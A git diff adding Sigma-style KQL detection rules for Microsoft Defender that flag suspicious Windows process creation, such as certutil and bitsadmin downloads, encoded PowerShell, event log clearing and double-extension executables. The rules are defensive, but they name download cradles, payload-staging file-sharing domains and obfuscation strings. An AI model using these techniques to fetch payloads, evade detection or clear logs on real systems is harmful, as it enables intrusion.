diff --git a/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql
new file mode 100644
index 00000000..072f8a0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Diantz Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Very Possible
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql
new file mode 100644
index 00000000..a5e27b99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Diantz Download and Compress Into a CAB File
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download and compress a remote file and store it in a cab file on local machine.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..e06d1d9a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious DLL Loaded via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql
new file mode 100644
index 00000000..bf4ad443
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Double Extension File Execution
+// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-06-26
+// Level: high
+// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "      .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith "      .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql
new file mode 100644
index 00000000..285bb01f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download From Direct IP Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
new file mode 100644
index 00000000..95235d26
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download From File-Sharing Website Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+//   - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql
new file mode 100644
index 00000000..eae00681
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download from Office Domain
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-27
+// Level: high
+// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608
+// False Positives:
+//   - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString("))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
new file mode 100644
index 00000000..3b0f2192
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..fa0fd3fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql
new file mode 100644
index 00000000..0cb317b0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Driver Install by pnputil.exe
+// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+// False Positives:
+//   - Pnputil.exe being used may be performed by a system administrator.
+//   - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+//   - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql
new file mode 100644
index 00000000..485a3e51
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious DumpMinitool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: high
+// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql
new file mode 100644
index 00000000..212f96f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Electron Application Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
new file mode 100644
index 00000000..557b32bc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
+// Author: pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
+// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql
new file mode 100644
index 00000000..b4c94242
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Encoded PowerShell Command Line
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
+// Date: 2018-09-03
+// Level: high
+// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql
new file mode 100644
index 00000000..bf5ff25f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Eventlog Clearing or Configuration Change Activity
+// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-09-26
+// Level: high
+// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
+// This technique were seen used by threat actors and ransomware strains in order to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
+// False Positives:
+//   - Admin activity
+//   - Scripts and administrative tools used in the monitored environment
+//   - Maintenance activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
new file mode 100644
index 00000000..35e2a350
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution From Outlook Temporary Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects a suspicious program execution in Outlook temp folder
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
+| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
new file mode 100644
index 00000000..f0985def
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution Location Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
new file mode 100644
index 00000000..9092079b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Hostname
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of hostname to get information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
new file mode 100644
index 00000000..6ea7768f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of InstallUtil Without Log
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
new file mode 100644
index 00000000..fbe91752
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Powershell with Base64
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Commandline to launch powershell with a base64 payload
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
new file mode 100644
index 00000000..20ce224e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Use of the commandline to shutdown or reboot windows
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
new file mode 100644
index 00000000..95afeb96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown to Log Out
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detects the rare use of the command line tool shutdown to logoff a user
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
new file mode 100644
index 00000000..4df7244e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Systeminfo
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Detects usage of the "systeminfo" command to retrieve information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
new file mode 100644
index 00000000..367eadf6
--- /dev/null
